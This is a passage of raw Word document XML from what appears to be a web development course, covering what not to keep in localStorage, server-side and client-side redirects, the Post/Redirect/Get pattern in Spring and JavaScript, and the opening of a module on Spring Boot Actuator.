          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shopping cart items (these are not sensitive — the server validates before purchase)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What NEVER to Store in Local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NEVER DO ANY OF THESE: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localStorage.setItem('authToken',     jwtToken);     // ← XSS risk</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localStorage.setItem('password',      userPassword); // ← Catastrophic</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localStorage.setItem('creditCard',    '4111...');    // ← Criminal liability</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localStorage.setItem('sessionToken',  token);        // ← Use HttpOnly cookie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localStorage.setItem('adminRights',   'true');       // ← Easily manipulated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 5: Redirects — Server-Side, Client-Side &amp; the PRG Pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A redirect is an instruction to navigate to a different URL. There are two fundamentally different types of redirects — server-side (the server tells the browser to go somewhere) and client-side (JavaScript makes the browser navigate). Understanding the difference and knowing when to use each type is essential for building correct web applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Server-Side Redirects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A server-side redirect occurs when the server responds to an HTTP request with a 3xx status code and a Location header. The browser automatically makes a brand new GET request to the URL specified in the Location header. The entire round trip is transparent to the user — they just see the page load.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HTTP conversation for a server-side redirect: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Browser:  GET  /old-products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Server:   HTTP/1.1 302 Found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Location: /catalog</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Browser:  GET  /catalog           ← New automatic request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Server:   HTTP/1.1 200 OK</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[Page HTML]</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Server-Side Redirects in Spring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Method 1: Return a String with "redirect:" prefix</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@GetMapping("/old-page")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public String oldPage()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return "redirect:/new-page";  // HTTP 302</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Method 2: Return a RedirectView object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@PostMapping("/login")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public RedirectView handleLogin(...)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return new RedirectView("/dashboard");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Method 3: With flash attributes (message survives ONE request)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@PostMapping("/transfer")</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public String processTransfer(RedirectAttributes attrs, ...)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String confirmNum = transferService.execute(request);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attrs.addFlashAttribute("success",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"Transfer complete! Confirmation: " + confirmNum);</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return "redirect:/transfer/confirmation";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The confirmation controller reads the flash attribute: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@GetMapping("/transfer/confirmation")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public String showConfirmation(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@ModelAttribute("success") String message,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Model model)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'message' is available here, then automatically deleted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model.addAttribute("message", message);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return "confirmation-page";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Status Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>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When to Use It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301 Moved Permanently</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Page has permanently moved to a new URL — SEO optimization, search engines update their index. Example: /products → /catalog.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302 Found (Temporary)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Standard redirect for PRG pattern, login redirects, all application-level redirects. The URL may change back in the future.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303 See Other</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After a POST — forces the browser to use GET for the redirect. Best practice for PRG but 302 is widely used in practice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 The PRG Pattern — Post/Redirect/Get</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Post/Redirect/Get (PRG) pattern is one of the most important web development patterns you will ever learn. It prevents accidental duplicate form submissions — a critical issue in financial applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Problem Without PRG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider a money transfer form:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User fills out a Transfer Funds form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser sends POST /transfer with the transfer details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server processes the transfer and returns the Success HTML page directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User presses F5 (Refresh).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser: 'This page was a POST request — do you want to resubmit?' User clicks OK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The transfer executes AGAIN. The user has been charged twice.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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Why PRG Is Not Optional in Financial/Healthcare Apps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">In a banking application, double submissions can be catastrophic — double charges, double payments, double orders. In a healthcare application, double submissions can mean a patient receives double the medication. The PRG pattern is not optional in these systems.</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The Solution With PRG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User fills out a Transfer Funds form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser sends POST /transfer with the transfer details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server processes the transfer successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server sends HTTP 302 → redirect to GET /transfer/success.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser makes a new GET /transfer/success request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Server returns the success page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User presses F5 (Refresh).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser refreshes the GET /transfer/success page — completely harmless. No re-execution.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WITHOUT PRG (dangerous for financial operations):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@PostMapping("/transfer")</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public String processTransfer(...)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transferService.execute(request);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return "transfer-success"; // Returns HTML directly — NO REDIRECT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If user refreshes: transfer executes AGAIN!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WITH PRG (correct implementation):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@PostMapping("/transfer")</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public String processTransfer(RedirectAttributes attrs, ...)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String confirmNum = transferService.execute(request);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attrs.addFlashAttribute("confirmationNumber", confirmNum);</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return "redirect:/transfer/success"; // REDIRECT to a GET endpoint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If user refreshes /transfer/success: just a GET, safe!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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Client-Side Redirects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A client-side redirect is navigation triggered by JavaScript running in the browser. No HTTP request is made to the server to get the redirect instruction — the browser itself decides to navigate to a new URL. This is the standard approach in Single Page Applications (SPAs) built with React, Angular, or Vue.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METHOD 1: window.location.href</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Adds the current page to browser history (back button works)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window.location.href = '/dashboard';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METHOD 2: window.location.replace()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REPLACES current page in history — back button skips it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Use this for login redirects (don't want users pressing back to /login)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window.location.replace('/dashboard');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METHOD 3: React Router (in SPAs)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const navigate = useNavigate();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navigate('/dashboard');               // Adds to history</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navigate('/dashboard', { replace: true }); // Replaces history entry</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After an AJAX API call:</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async function transferFunds()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const response = await fetch('/api/transfer',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method: 'POST',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headers: { 'Content-Type': 'application/json'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body: JSON.stringify({ from: 'ACC-001', to: 'ACC-002', amount: 500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const result = await response.json();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if (result.status === 'success')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Client-side redirect after API call</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window.location.href = '/transfer/confirmation/' + result.confirmationNumber;</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When to Use Server-Side vs Client-Side Redirects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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Server-Side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Client-Side</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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After form POST submission (MVC app)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Use PRG pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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After successful login (MVC app)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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return "redirect:/dashboard"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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After successful login (React SPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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navigate('/dashboard')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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After successful AJAX/fetch API call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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window.location.href</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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SEO URL change (permanent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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301 Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Authentication guard in React Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Navigate component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Unauthorized access in Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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302 → /login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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SPA route navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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 React/Angular Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 6: Spring Boot Actuator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot Actuator is a sub-project of Spring Boot that adds production-ready monitoring and management capabilities to your application. Without Actuator, your deployed application is essentially a black box — you can't easily tell if it's healthy, what it's doing, or how it's performing. Actuator gives your operations team the visibility they need to keep your application running reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 What Is Actuator? The Cockpit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thick" w:color="1E40AF" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E40AF" w:sz="6"/>
              <w:right w:val="single" w:color="1E40AF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DBEAFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
